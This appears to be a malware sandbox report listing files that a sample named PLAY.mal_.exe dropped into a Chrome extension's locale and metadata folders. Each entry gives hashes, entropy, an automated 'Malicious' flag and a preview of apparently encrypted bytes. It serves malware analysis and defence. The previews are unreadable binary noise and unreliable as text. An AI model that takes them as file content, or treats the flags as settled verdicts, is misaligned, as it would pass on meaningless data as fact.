        Preview:.#....k.2j../.4.`.`Y....V...d..v..!a4.....DAI...+N^....dn.V.M.eh.......&mO...z..'j.....u.l+.....s....6.h).....X.F..79...R...I[4.....Z.z......pm....v._..d.....;.e9d...>.Z....$?.../>.>.ag...."..\..........Y^X..?..X.FQ....Z}I..C5g.....M.........h../z.S......2..\{gA..@..S....m...E'.0.BX.N45.N...N..e....Zp5uu.....A>..z....V....P.,....j.......K_;.....p...t~....4~.6(.|..n.x..,....S.3.......7,_?.........L..#g.J..n.7.._:)^...:..!...^mB.......i.c.....A..@4...V..A%..J.X%.v..,...}.U..5I..oe.Q;7.;.."...`.].|/..!.H$...H .)K.GM.........0..E.&Q......g.9{P.t|eZ..RP.....M......+U......x*YHr.....cz....|3i..........-.=..G%.`.|......:.....,....i...e.nr..x....[e.. .x......t..B..q"...[........Z.y..".R4.......x.....;.G..H....:.2.1..Q2.&eGO..../..}Q.....f....7..ym.....?..$Yg];.4L....;t.+.T..a0g:RF.....n..K`..W..t....7.].u.<j.5.`uN...Z...!.....H}QX.-.`...T..U.|.!.I>..........................Yc~.J.j`..e.4Ve_..$.Lq.'...(.!l..;..&.m.ue...u.t.FD.5.l.Io.....{

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sw\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.894092123946256
        Encrypted:false
        SSDEEP:
        MD5:DF396E0F2E443763E0F02351A68B8D4A
        SHA1:DED3BCC362801180624C6A095EA0FA79E993534F
        SHA-256:D20590F7CB1919FD48087651E2B0638F3C2686CDD219D60D163D1E3B26031FA4
        SHA-512:929D1F3E778B1BFA6DA5D31DD7F60CA03D04032A9AC967A50840BE1E533249DD74C94A0CF3B00E147FBB37ABCA431AC4BD2E5AC689EE2A47A752C18727F81C62
        Malicious:false
        Preview:....Q..t.,"..i.`M.......y.....i......G.....S..o9..4...Fq.O....}.%...W)..PT.kM)...aMK.L....sv.M..i.3\D.M.).v.P!v...........D....... .U&a_..a._<.V..b..X.uyr.Z..?&Ws...b.{I.zf=....u....FB.>\...v.1.E}.....Z.q..h]U......dB.o.euV.vU..NT..A"4.............2.`O.$........%.qg.S....:U>^.0..Ugo..O:&.Z/.|...6./-m.....(.w7.A[.w)\..`..."..J..N.d..w?..s.Q.V....y._.nV...r4...Y...n....9_...c.7...R......+G..$.%............h..J.cI..Y...-........Uel.Q..R..8.Qa..z..4A.U..G...LQ-U]..@..p..\L.I.;...tS..@vh.0vQ.@.<.}3W.....(...:...W...n[7....N....>.ax.R$.gx...va=..]..Z.G.OA_.)..n..M.=.....s.^.+.......CX{F..q.i?...=.........Q......l.^....ZEdMylT{.H....T...U..W[.sh2+.I..n@...2.L..KM...c....hN.....G.....o...b....m....Ys.HN.8..!.a.t3V..D..._@..t...L.c..J.Si.RQ.D.j..h*.B.`.R....qV.9.h.3.._...l<RO).mH.y....:....P.....[..}q...m..1.Z3..F..1.IK.........v.U<n.8..t...wJ..Cz...}......0.'/...gP}vYt..>.}..S...)9..D.iR..y....j2..;.'e.D..<.v1.....xg~m.^Kt...T..U.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ta\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3016
        Entropy (8bit):7.933034692909487
        Encrypted:false
        SSDEEP:
        MD5:DEF34689504CD28D7165E5D3FC965C9E
        SHA1:8FB274F831EFB322779690AEDFC8E640DE10B0A1
        SHA-256:F9654477685ADD916EEABF28F7B33D272036C7032AF705B3375850C55575C960
        SHA-512:DDBC0C6AEC8EC445D32D4E251A9CB0D0EFFB94CF6FC2BFCA2E1987D2BB9AFB0427D0A233A734148553581DD84E5C556426E1475C82B7DABF3655FC3C1586F26C
        Malicious:false
        Preview:}L.-|..?...l)...j.Z..+...`n.X.s.....%....s?<........%...W...4.H.....Q.....H.../(...=p.<.....*M2...".C.%Vd..*..;C....6..R.....@.U..O.<....*.......ps%2..8.....aM..k.e..d`.p..B)8..].<..[...J..."kre(..i..:.;..\.N.\......C...}....v0#. )..M .H.r[.3....3b .....2.,.2l=~...%Uz.kV...V.../..)...+.]..6:.{...%'IIr2...0.s...a:7.....I.TU..^..f....0x/{l......YZ.I..c..9$....b.TI............+....c.../..O9.:GG..l.Z...!..4.....#.o.[..*..R..1}.E./..i.0...4.......Wd...7.g..+.ug)......-d.... ............Pz.~.....C.T.4=-}...Y.4..v[...P..k....CmJ..._.c..V(.|.~/..>....J.[...%...r..`R...7g.......E.d..UI..Z.......N>8.l....!.......X..../.]2.q..Of"8J.... !.j...>..lg....@.~.L+^mu..$y..(......@.^G9......NJ.....j.p..y"...\;e...g.B.o5....6..b...^.U.JeduIw..M......w.d*..%4y.....p(.f....RS.Mb..g.....cIr.;.%.......m.~.p.a..D*m....-...k>..rz....~."T{v... .......{..._.O_.*.EM.....]8.ou.....H....G\c..byem..Fz..9K.Ws.Sm..*..|0.....EQ....r...VO...4$......MA.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\te\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3064
        Entropy (8bit):7.929335182103116
        Encrypted:false
        SSDEEP:
        MD5:737C8BAF2D9477A9055B478C4B10C557
        SHA1:395154D4D397FF3CF2FA2895AA1FF64DFC0FBEF7
        SHA-256:28C7776BFCE024A513812AC5D8DB0672E60E7B797A88E7F8316FFC609E97D0C7
        SHA-512:5763A1C369E5BF1957F7EC274108BAF640816005C24681A073B0B7771597930FFE93614FECA9DDAF32E7483A35AF8834C4AD81B76AF0C86EDD8C981E3607F45B
        Malicious:false
        Preview:..CZ.....#.s.....w4`y]...._c.._..........!...8\..%(..a.2..d....p....=..>.T....{.<......j...._.=.5..:....@?...#.=..r.O&.Py...Pw`..Z\..UFP..n.:...K.....x2..GSC.p...$...&u..\{H...8.......P..ub.1..K......x2,h#.^.g..g..|.R....!A-.....o..0.Qzk...K.*M.7R_...&.a.`.&...%_hl..`.g....T_.....I...VZ.s....E...l..wR..u........u;.@E3..:.(g..v.a.F.....]...qLq..>..g.D.......c..T.E(#g.a-...5.k.n5N.....{...[......Ij......!..q..4..<.@.#...;<.v.&3x.......DV4V...<...[w...D...R...j....N.\F4|...hJ@.'?..j8-.\.....o...O...PR.v`@..z....5~.....k.....n..H..:..fr~`z../A|...A..A....D...w...1.,..(.8....%V.#^J..#.........yG2k.'/.g2...*.~..... .'...l>..u...K1}r.G)..e<.....'.:.../.u.<'.PTk...I.....4..|7..H...G5JL...d..R`%.liR.0:>..T.t..{-k........?......G..o.. ..s..6...4I2...O...8..l.qRw.1+t......=Eg[.;..P=.i.Z....>!........S...w..q.|.."...G.w{.!o!x:....%'...r...A...W.S..).Sc..o.......S....@3.W.,..Y.............F.......!S.'....Tz.....C.^'~..0..J.@Yv.Oo.a...q....)...&Vx0.........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\th\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2744
        Entropy (8bit):7.936948416238749
        Encrypted:false
        SSDEEP:
        MD5:33C7D614963C0DCDB6E3158ED4A8EBCC
        SHA1:0729ABD0F4ADE9E9FBC1DA101CE4D48DAC2236DD
        SHA-256:4DCCE215D06A0B9974C3F87D6A37C7E7DD0022101D56882EC628AE9EFC29F1D7
        SHA-512:9105B93B364E0C29D3A0643C7F123BB5979B862DE1486D1AA3D01851B38862C10E82DD74758A9CE086F2A6AF925DE59067428311C398C8D08EEE75C3110DFE59
        Malicious:false
        Preview:Y......1w..q./V........D1....lg..F..!....Y..'....}.J...b'..:....H.:.!..`..$U...).H.Re.{?..1.,...+.....}0w......7W....x...a|FZ.....o.AG.d.R.Xp.)`...;..[t.+.l.....=.6~.+.N^U...*.....<./....3....oR.;h..p......p..$._.i.>..^f./m.Q..U.6,.{gaT..4.V.../......NN...."a...E.."........iz'..*_..cm..,..T.C.K.,E]7o{.=..1.`.........SG...".N.z/y9jT.U|z.E.....p.g.. .....O`,qi...U.fq.......wj.OK.Ll...0!.s...|.P.....P<q8.....M[..-7C..7~)Y6....W.h..wf..^..Nw....*.r..c...Ey...D......X.......K..Y..>.!.B..lj.....O....8.K6....?o..{.k1.:.m*... ~...W9|.l.......zW..%r.M....Q.0vPkb.<.Q..4).l.9..b..wr.4...4...CRu..~........d...7.y.........7.m...].....n.!...~Z.9.P.\..."#...Vw..!,n.-y.Uin..I....<P....>..8fwl..=T.z.>....J.Z.5..........0.$....K}....+.Mb..b.X...]CT^.._...?..B.c d[D).jO........3....qI.R..q.}.zX..V..t.Q0Q.....F.#.Z.......Z.5.......G.:P&....YaNK3......;@...W...@..X..Y.9..:G...+".....\.r.......gb.....HZ-...O2.f4B.aB...j..s..F..J,z.x..;.B..R.k.1sp.oZl.E.DJf.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\tr\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.9042627911998755
        Encrypted:false
        SSDEEP:
        MD5:B2B40155E9833CD2E04C5710563FE6A8
        SHA1:0D6E77A7B26392B85F3CA12258624657AD5EA26A
        SHA-256:0402B6BCE1093E2A76EFF1EAC599384B34F84240EC89BF28C7D1C38A47D33BC8
        SHA-512:322C40039C3582A62C25AAE1B11EDE14E5FE9A18ADED1A7F5587BF423B9ABDDB0967E6F03C86A45675AB72C5BAA9213AE8C206AF3A77AA4B49BF95137054D543
        Malicious:false
        Preview:K....4.a.....*.<n_hz.!.y..ne...,.'>..9.n.=......t..U/......[..|..8..,.X.....4.j....Q,..b.<..uhx.$)E..@_.X^}.K..$.(.&.O..L.m+&..G.)..d....O.`.]..E.[&`..u]./.S2.P.4s|g...jcVj..)f...+.E...J...C.....B.C.P.`.og.D.F.=....~p.`.dX..Q4...wN.[.I..............o.!..k....Y.ty3`.&lZ...+..hs..]P..X[..L...#,q.Ec..B...E.=.I..%(.-.P..V~1F..#.t_.).-.......M...j\...^.&....}.."..O....U&*/.X..0zl.:K.E..D.#e...%....{Zx....C.....~.d..f.'..'|?..[W.+....&.......U!....s'.'...c.e{..... .:W.\m.>k;v.E...!(.I..[.h.3T......:.zl..F..../s....lnrr3.hq@p...+........._..=... .06nh.B.9......x.gl..Kz..&....H`V(...,.B..5-g...jB..F.G.J..A...|..>..~.o....N.oQ.nH.k.{Z...2<q].x3.i..%J../..*.J..'Pt......n....Gp.......|.dhP.6.....l.>>z.i.{R.}...IA.5.+!.XD.....%.6k......!'..U.U./..W..U%...,.=.1....0.q.d..C}a...9.[|.Id...R....R$L...R%o..V.:.T.A..T.?R...2.S$.u/{....@F@..$.>./A..a.....|My..]x.Kw..r....... ...:.g.....)%....JlK..z....*.P..Q@5....._.........r@IBFR...d...............<..Yoo..U..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\uk\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2408
        Entropy (8bit):7.919274431821004
        Encrypted:false
        SSDEEP:
        MD5:F5C6DEAE7F5A7211A0B201A4BA07165B
        SHA1:9EE6D7BAB2F77062A0DD64FBDF38414E8E9BDAE0
        SHA-256:2CE88A266B6E11AFC6F7125DCC9D5B68C66FE798BB1F0ED3CCFC0CF4EEB22994
        SHA-512:92E20A2A7C2FC0CCE9A895D2653C797CFB6F703561585C805215361B938BE02FB893A7AEAA752F35DFEEACD74685E7846ACAC7CFE64DEC4B847AC28E1F503E85
        Malicious:false
        Preview:wU..87..V.$..,...Q.?N3...g.........n5.U....?>#@....Z.../.....~...y.?...W.E.$.....r\.Kz.L..6.z>.?..:.e....\........=...'.h6.h!.R.F.=.r..............5....BH..'......;..c....N..J/..7...F.s.2sAe...[Ent..H.;....b.X.3....0....%.....?.\Sm;.g.{..U...L./w....../..{... .9..2Cb!.1.MW3Z~~.`..<]..D.1..+Z...wH~.~..G..2.H.... ...U..%r..Z.`..}..]}..8.M.e.....:;F}..Cj....{.....,,.b.\....G.E..F..le.!._.z..h<X..z.k..>....^.4.D8.9~5..#..K^na.f.f.Z...........L4...."..4S.....y..-..q_..?.6g.....F..K$M..y.D4.C......W..Hb..Sz......o.k.G8fr.&..\\...X..B/.<D.pg^.....R....5s)..5.K...)..}.....K...MI.<....>.s...%.,.Y.D4..}../.!.B.$..r.0...e...0j...e....D3...G..V..O.K./..s......w*......C.y.|.[....).%5t.e..Y.Q.OH:/].[.?Ir,...=Opa....I@I.....-..&.1...i..]..X.u..?k.bP..~Z...+.2+.v._1..T...}0...).....N..hBliG.........?*#:..D.:..'<.=.[.....K..?x..f..A........Y....L.Jx{.-Da..W/..'n7:f.{.. ..A.&u....~n/?..w....pa^...a....5.V.o!.`c..X}2#.+I.1B.8..V...{C..@<V.1

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ur\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3720
        Entropy (8bit):7.94536669119926
        Encrypted:false
        SSDEEP:
        MD5:6CE10D523ABB3F4A994C694FCBA662D3
        SHA1:88910D76C448C06FDC4375A9DDE0D01DFAC9AC86
        SHA-256:7F6F9104BCD337856889203C2E4F241F26A14B7A511E4014394D79F61E2CE099
        SHA-512:1702002917FD67C683E4C79DA6E3A2137297440AE3B07F2E0DF103393EA42FE2402F585F6A4CB20CAB72FEB3E3751AFB71A36816E1CD5EDBF2FA82BFACD4A3CD
        Malicious:false
        Preview:..#.t.-. .>..E..[.i...s..|.A...\u..5\.Q...a ...n.\..Y..H.Q.I..B..5..[s.@a..O..3....:.;..,h..y....U..+.......-L_~.~.`..9Iq.....0,......c.dl.tO......-<....N..O..+......].@..M.b.\..........x...*1..*G...@....bB.d..s...."T...g(..JV...u..ED..9....Z.....l...S.e.S..N.d.h.>.[..z..M..X....y.*...TU..z.1.E..;.g.6l-~.G~..a..&..Vr..w.A...(ko....F.E#.ni.."...Vi..M[YR....ZL*..,..SS@Dk..rp.............m6.G.p...g....7........"..M.C^z,.?.1..-./....4..O...H..........8{g...:.r..a.@...4.IeY..Y}.;.....RH.nX..=...CN"..T=..eE.II...B.&HE..|.....Y .s...4V3..0..:(?[....,_i...?.r.. D..............y....z.:.n..5.;'...J.3..y...E.g......vx.[7.>x..k...o.......P.U..6."..P...'3..b.'w.7.oQ.Wc..........n.....(nQWx.W...Dc"..4.CT..T...X.y+...a@/j......-_.t....Q7..o:'...gj..t7......ONr6x.lE.]...&.c.-.9<...h..6..z...i.|~....p`s.......[....G..........!;.Og....(_~.......~?.Zd..I..Yc...FZ...F... ...3A"~...;..l. a.~....;.Y.r.>46>...._{..^..h.....M../K..l.l...$.@%.m....4..{...O..H../.J"

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\vi\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2152
        Entropy (8bit):7.9248437106216505
        Encrypted:false
        SSDEEP:
        MD5:8CF60CD2CCCAA61D4ECDC0CD3481A89C
        SHA1:9E5C2312D8A88693DFA72E27136D849D8BE53176
        SHA-256:899B4DE99DA1F484EEFB15F7E638559D93649EF7EED0B5444E5FC1C4EB72750F
        SHA-512:59DF272FF50A83C5EA84EBCD61C8E06BF2762E69DE600AC53C8C1ACC3846BA2BFC7B9FE7770DBD516BF087B157C733BA246CF2A9C58EDE24E81678E9E832EF62
        Malicious:false
        Preview: R..%..p.(..:ii..S......y.}$...U.. g...r.t.9!`......;d....V..%1.S?B..C.....Ev]..-....K..#.7T.>..):y(.N...GG....-f\+......9.s....{....K.*Y_\|.\.Zs{...!.dK....lmR.(.......,-...D.*.?.Ut*.MZ..%,|s..H..r.I..*.W1dT.~(.i.a.p..w.1........VF.4. ^"..Y.z..Sh....6......t.o..7........K<2.q.....).Z.S9...q..w....J8$.P.....8..r.x..).eM..v!L.(.+r.-F....~..L...U.aa.v.u.O..(..;Z...,..T,.KD..-h;G.p..O.Ux0w"..{BF...KJ!..C....WX....E."i.1m..a?.V.&p..J....`;Ji.*...1.....Y...P#....e....-...D.2..N...+.."lb.x...w[.v,.*Z]A._.v...6.m...N$.hPe..W4....+..;....(...@...a...kl...+.l.3s...O.=w..6a&|/..<...t..W<...J..W^+j_.8...m..+.&.?of$g.q...........E..gn..cA.{.o4.J..(.......v6("...l..2..._~l.m...YO.[Q.......[.:h|.vp.FE.`....N..=....1.L.]...Cw..).....6.c/..Md.GU.Z..*%.J..T.l9..g....b#<"3.....`<p..b.:M..&....=mz..G].lq.~...a....0.O...Um.i.s..2$.r._..].K..~S.*o..B...c..]'..{...<..>...V..........e...>!....3wV#..QA\[..".....@.<.EK.T.EXz`<....C.Y {..m.6u.(.(2.4].{.v.H.eRJ|

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_CN\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1944
        Entropy (8bit):7.90733426209899
        Encrypted:false
        SSDEEP:
        MD5:C5DAE7EB7B94558CD9238707CEA1FF2C
        SHA1:F374E66A11AD76998A2B50189A68485F2629322C
        SHA-256:DE044AF3BBABBA35245BD2D0DD4CD11D577B42ED0B2119A2B12DD00435A03A96
        SHA-512:6B57206FD7AC4EA795B88BCB7D525403A15BA3C6EFF5D459571D04A603142DF0FE23A367ADF96376D1304256FB50F95B10BB9AC902EE00A8730BD5ECD436C9B5
        Malicious:false
        Preview:........7.5.A...+...p......CA[......s..-..)."zv=.@.Z....B.l..R..D.j.....U.,.....V....~;wd...=:.D.g$......J...&Fk..T...a.......9{.HC..u.Eo.&.HB.r..k.A.mVw*..o=...H...Q.v....<.*.K8......\x..E.(5...K...k.`Mfc=.....:..zp..y....E.....^t9."........-"..)..|......L.0.6...ta......9Y....M..Q.L.+;%...>...q.Jw%....H.|..g....=.jl.a(S...6..&Z..C$...pw. -%.5&.zC;6i...}*l%3.J..mf....\./......\.C..Y...8..A.]M..!..M...J.p....v..)..l ....(.p9.j`.....|vj..........zd.....hbVa..`._Q.T.!..0.....P*9.^..x.'r.o...V.pO\..Z.......;...ft~*.$'....e.j>38..z.......R..L...Y...h....LOT....?.r..\.1.g...?....J[...u0...N.".....k.O.H.E...A.p>.<..IDpy.=.1Z)....;w.?..{....Z..'...G....rj.E.0.w..-..G....Z....K.K.8.P.~.S.$.!.M.+..-vkq?`..-=...{.BMHol#7.3f......;M.D."U.....#..U....y....-....I.]{F.Q.d!........O.i.....T.nSl"A.<&W...`.7S.N9p...S'. .x%.`..i$U...T..U.|.!.I>..............................e..=W?[...|.}.|h...Z..C .k...1.c.<. ...p.$..Z..X.&.......v.qj...b........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_HK\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2280
        Entropy (8bit):7.91707782371264
        Encrypted:false
        SSDEEP:
        MD5:A946C55B16CE9637AE7D7D86C0FB4072
        SHA1:998EAE275D9B461D1452E318075BE84031C4A7A8
        SHA-256:9CFAAA1DFAB472C9BBA48967D4CA85076FF1B33645987AFBCD4616EE535B3F3C
        SHA-512:F8D495DBA338D2731E09A8FEEE4533EC7CC866101DF5AEDD0527B2267F783AB9251FFC8A9EC845C4F1FBE1110919287A3690F7071D740B42C253C816493DC4D9
        Malicious:false
        Preview:.d.+..}=..M.?.O........*U......|..[..-X.....j%.......vQ.?......<<.*.g}.....1T...}C.q..6...Y..[..5n.;....B(.@....Ug..hgs{jxF....e...gd.....H@....(B[.P....w.=......."....Lhx...|.6..0..,.`.i...U.@.]U^.gQ....M....u ....v.C..........:.j|l..[|....l.(.A.+.....R..m......U....#....k0.x..*...!,I4;)O...........;...>.....Q.z._j...@.......2..Q.5.6Zh.|...ux...\...:...ft...+...f.h..h:....5.^...v...v?.B7.+z$.V.{..UT..:..'..h.z..W5.H.a>.._Eb...z...`5.sN.b......)....... ?..@.4.g.m$...N..3:.0;.....]..W....J.....H.z.<........p...z..ks2.5........B.$.i..^....S.`.i1KaMQ....6`...n....P./.wwf......9....G.Y..p...;}..r.q..lV..m...bH.._...5....").....=...|z.....".._....J.8A..._..'.7..k<,....O.\.....jsuc2h...u..{.G.:R....Z....2$F..E../.0'.o.../t...8Y.@...<...J..J....!R....K.......U...Nv.E:.'g.tA.....?....$Z.8....`:.. >./,.x.J.M.~..G...c........Y.N.h'eI.,s..P.^....=.Z->Zn.\.F..cc..........6...i......f?...8.t..lj5=."rl...h~;......"J../......q.gp]...'........$....qQ.`.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zh_TW\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.896360578924943
        Encrypted:false
        SSDEEP:
        MD5:39ED890C0D663FD16796E9CBE2E93FE7
        SHA1:50A5C2FE4C3AA311F99CFE590324E5FC4FE4C66C
        SHA-256:F86BB1EB84C7EE9B97F06FEA636A79BAD054C95852C1CBEF9B176452D012A2F6
        SHA-512:3B221369687158847E02CE156539F911B6F2D31C181125670337592B81AF3D136DEE50B4A0DBCF648440E7D6F95ADF7440EA572794B9797FED16D8EEB07A7667
        Malicious:false
        Preview:.GM.s...N..!.....t.......y@.."..s.#....8w.R..n.aF..02.0R0.^G...wE...p.?.bsV.E...D..vY.c.T#ZL...;..Q.x... ..%.\....s.bS}.i.E.......p.Q...,...T..@......h...b.M.D4....|5.A.N..}.e_.!.] J^...N.3r..GVk. ..2.0Z.d>V..$............G,v.S.......4..e.T.TB.7....x.K..lc^.....GL.*q5..*.w*B....g..D...`Y~..5!.O.8...-....x&..\n4..m.De.<...(e......T.-RI\.l.....2N....8..J5al6.....v......../H..#.bg>.0C.l.xx.....a..h...>..9.n...Q..I.+...u>pF..(...?.O=..../.$.4h....%......*..."?....H>..O...f.[HY.0....7......q~...lN\./...,C.#...Ji...{t;.n..T.$...Zi...pT.8..h*...|.!......OzP.....D.A...\..3..z.YAF....$..A.b....B.I.....@.......uyNp9..o(.B.../f.!..W.Th..... .<{.!.A...1.D?g&.X.....H}...x.....#...s.6..8x...^...Xo&.&.,\/..>8.E..\.~...&..........)`.g?J.I$....DJ7.Z..T'..z.1.L.<.fi@N.yN....>.gU..........eri.>..R....,3N...$....."..7 ...T..U.|.!.I>...........................IIw..9-_..p]K...y;S}...y....K.O..L..d.....{f4..b...:2..]-^E...2.....U....&84.7..Au....&..5NP[A\~T...l..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zu\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.900116059507434
        Encrypted:false
        SSDEEP:
        MD5:5F4E5DF166543DAAD4EBEE6C53292D07
        SHA1:A189361CFD4E09285F6BC7525E1D5947586D6420
        SHA-256:C2715A82F7DE2B507ABBA083B8113028B3AB8909C9DD1305214F808CA8DF7B97
        SHA-512:519484A0BB9EB72B137404ED034B0A479A8AE0F3102D91523261FA948F1174159951BD92C57DC5E26263801215389073F7CF35DE382B1551700D498B722EAE2A
        Malicious:false
        Preview:. '.].V.I#cn.' .X0...Q..PX@/_.#.Z..vIo...Al...E...O8G.N^aV....].....D_..a.p..#...M0M....).r.6$..E1..l.V...._....L......i..i..d..s.S.r..r...\.>*.\..@.....U.-..8Uf.o......[C>......o.A..k;8..........)`...|..d......8...*.h....&...<.n.~:.{.....N.=..o7.m.*.uoXm.6.I.e.H..O.....o*...J..z.....)!...R,9..TG.../.Q..i.........E....%....r........f......x.......s..6..7....6......6..%R.....P"g.........`..%aD....ql..^`w.D.lXLk...d.".N. #..w.r@b?......Y^.@.eZ.'.o.......w. .....5.z...ql.gH..}j.Z.A.dT..._..m.02.me`G..@0.Ms{a..*L.&u.}...U...%:Q.o:..W.H..^LN.g..Q.:......ly.v.......c?..E..8.*..C&k..........{."."..-F.......{.9.7}...+..r..,Ge.....O....2d...7.......M#B..$..~.@%....N..L..d.K.....XEc..._.^.M.{..2H..MjA..|.(...M...O:..)...Ic;..k....GS...hh...LtF..%[(..cg...!.b.g...QU........<.x...r..2*..T_C.....EN.0P..un?.........t......>.X8.e.2V.4.....(.......%.B5.W..&........3.u..../t].F...T..U.|.!.I>..........................!3.@q9M.....?X..4.....x,...b.g.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\computed_hashes.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4696
        Entropy (8bit):7.9600980035268165
        Encrypted:false
        SSDEEP:
        MD5:A21D9341B951AACEB1828CCBC3CFAE79
        SHA1:99CD917D18C19D1A70C7671B8D33048F01B5D982
        SHA-256:CD67AF2E47F9E6D28640096A41B41970E5289CAF5A7ABEB21E671D77A30900DB
        SHA-512:88A12F496C4286E70AFEAA384ECABE83AE19B114AA61BB8A0F88989BB0764459851A16753CE6ACF81F7DF2851F1A51367EDC0DADBC5E238C3A289A41140C2E87
        Malicious:false
        Preview:.........D.....$..6...j.P&...h^.a[....<aXkc....#kY(..m.iI.c9..Hy..44.......,.D.....N.sg*..r@..^.'...n.Mj....$..P%..d.G.*Y....~....y.H..h.B..m.Y.:...e.DG....O.p..M<...i....]D.WId...n..`.[.i.*.*.=......6.uW!..]......0...........W>..D&..S...z..z....G<Rg".2Y..\.Cg..@.B..@.R..Z7...N.N.~.=..O!..dh....._...`z".:....j..v5.:.....y..D..]j..8}.R%.....:..../..gUH...I.i..^......-D..u.."..8..&.f......t.z}..w.;+.H..Dr..pv.Y.V.....y9..n........Y[..m.....'6.%.)h|....E.{.`Yt.RE....`u.0.(.\.......R.....p....E.qse....X.u...H.]1..K.v.L.kv...E....G.;v."Z9U.3;pL.iT.z.h.?...#h/...<y..t..}..w......U.P.........._......].6N...Q.&.x.._/|..d.......q.}.l#.H.R.y..Z...MW...l.R..c.d.....C|..../.Q..b..%.D*...0GWD..Dj...R.&..x..P....Co.#.2..>.[....].2...WvQ.....qeb.GC..k.L...5.<;.....Ok...n.n..`..c.>sfn.-........S.*...i....>3]......Q.d..%...u.]j.|..S6$[+rc..3,."~..6.-../..~T...5n*...%].w.g.KsSL...E.3.c6~..f......G.u..L.}.......s... 4...;#$G....0.....".j!.N...1.(.P.q.aJ...../.Q.L.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):19368
        Entropy (8bit):7.990888193728898
        Encrypted:true
        SSDEEP:
        MD5:DC5AE393548BAA3E476B7F03056577FA
        SHA1:9FA401311880769469749ADF4BC2C351A2358954
        SHA-256:03A996F8AD9E1A843F859B65F790CE4A8121553CF4228C26484A0DF219306035
        SHA-512:6808BC4FFEA4DA10E3CEFF0E3E6F97E803ADDC5AF83EF0F1868CAF9EA6F72058CB67AE32A4CABB32BF11A120888A978BCF508EF1360FCF224E8E7D2470FE9F66
        Malicious:true
        Preview:T...@...%...@.7.@.t9....%.].[..\.>S....Q..$....?..X.r....q5.....R.S....~q.("Z...|..n..c*.2.........Q8.U..V.[........5.._<..*.....Xk..........Yq........1.B,.....V.9A..#.Q..........t...e.W.[...1..O...".<.N._...w...#."C....[.....T.7u.1T.8..nR......]G..%......>g=b.3[...3V~.;P......1.8..#.^1B.V..;`W...Q.8..bO%...N..;M...wi...X.5>i.......s.....R..q.`.b.. cJYT..n4;.....72..X...V..e.e......[.9*MG.&.L.h.a~d..i.~.............<..`...QK.7...........N.$q.QO.<z.B..]...*t....~fD..p...|.v@..v.v....3..\.T(s-.X..o6/...R:.[#--...[..H.......Q_.R.Z#.../..&...eqk.<..i";x...YY..+.L{k..x...m..3@..$......b7V.....E..pP......r..y....+..;d.....T0S-[..+...t.. 